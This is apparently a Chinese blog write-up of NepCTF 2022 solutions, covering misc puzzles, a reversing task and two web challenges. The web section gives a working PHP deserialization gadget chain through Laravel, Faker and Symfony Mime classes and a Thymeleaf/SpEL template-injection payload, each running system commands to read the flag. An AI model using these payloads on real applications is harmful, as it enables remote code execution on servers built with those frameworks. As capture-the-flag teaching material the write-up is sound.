影影之家
0%

NepCTF 2022

发表于 更新于 分类于 阅读次数: Valine:

NepCTF 2022

misc

花花画画画花花

花花画了一张图,你能看出来她画的是什么吗

下载附件发现是.osz文件,是 osu! 的一个谱面压缩文件,下载osu!软件然后附件拖进去

image-20220715184927423

启动osu!,进入到edit模式,一点一点放,这里放个图吧

img

最后拼接一下就是flag

NepCTF{MASTER_OF_坏女人!}

签到题

极限套娃

附件就是套娃,刚开始出的那个套一半就卡住了,后来主办方降低难度了,新的附件有思路,就是简单的套娃

image-20220715185253401

解压脚本如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import zipfile
import re

zipname = "C:\\Users\\25963\\Desktop\\新\\xxx\\232\\231\\"+"230.zip"

while True:
    if zipname[len(zipname)-4:] == ".zip":
        pzip = zipfile.ZipFile(zipname)
        res = re.search('[0-9]*',pzip.namelist()[0])
        print(res.group())
        password = res.group()
        password = password.encode('ascii')
        pzip.extractall("D:\\developer\\python_shell\\zip",pwd=password)
        zipname = "D:\\developer\\python_shell\\zip\\"+pzip.namelist()[0]
    else:
        print("end")

image-20220715185354913

发现是伪加密,直接用winrar修复

image-20220715185440337

流量分析发现是usb流量

9点直播

老老实实看直播,听出题人说有多么简单,然后拿到flag

image-20220715215119009

NepCTF{bad_woman_nb!}

少见的bbbbase

附件是个jpg,用Jphswin,无密码,直接导出base加密的flag

image-20220715224825979

base58解码得到明文flag

flag{Real_qiandao~}

馅饼?陷阱!

结合东北饺子城,百度地图搜索得到对面就是那个银行

image-20220716211423856

银行是光大银行

NepCTF{www.cebbank.com}

re

快来签到

下载附件,ida32,打开之后修改最大节点数为9999,得到flag

image-20220715220158915

NepCTF{welc0me_t0_nepctf}

web

Just Kidding

image-20220715233829454

image-20220715233815201

反序列化漏洞,poc如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<?php

namespace Faker {
    class Generator {
        protected $providers = [];
        protected $formatters = [];
        function __construct() {
            $this->formatter = "dispatch";
            $this->formatters = 9999;
        }
    }
}

namespace Illuminate\Broadcasting {
    class PendingBroadcast {
        public function __construct() {
            $this->event = "cat /flag";
            $this->events = new \Faker\Generator();
        }
    }
}

namespace Symfony\Component\Mime\Part {
    abstract class AbstractPart {
        private $headers = null;
    }

    class SMimePart extends AbstractPart {
        protected $_headers;
        public $h3rmesk1t;
        function __construct() {
            $this->_headers = ["dispatch"=>"system"];
            $this->h3rmesk1t = new \Illuminate\Broadcasting\PendingBroadcast();
        }
    }
}


namespace {
    $pop = new \Symfony\Component\Mime\Part\SMimePart();
    $ser = preg_replace("/([^\{]*\{)(.*)(s:49.*)(\})/","\\1\\3\\2\\4",serialize($pop));
    echo base64_encode(str_replace("i:9999","R:2",$ser));
}

image-20220715234022070

NepCTF{e3edfaa0-e66e-4c7b-8c0b-e1cde5c7c40a}

Challenger

下附件,分析路由

image-20220716005743688

payload如下

1
eval?lang=__$%7Bnew java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("cat /flag").getInputStream()).next()%7D__::.x

image-20220715234918429

/NepCTF{b2d6a9bf-4f90-4abc-b5ae-9c07c4439ca5}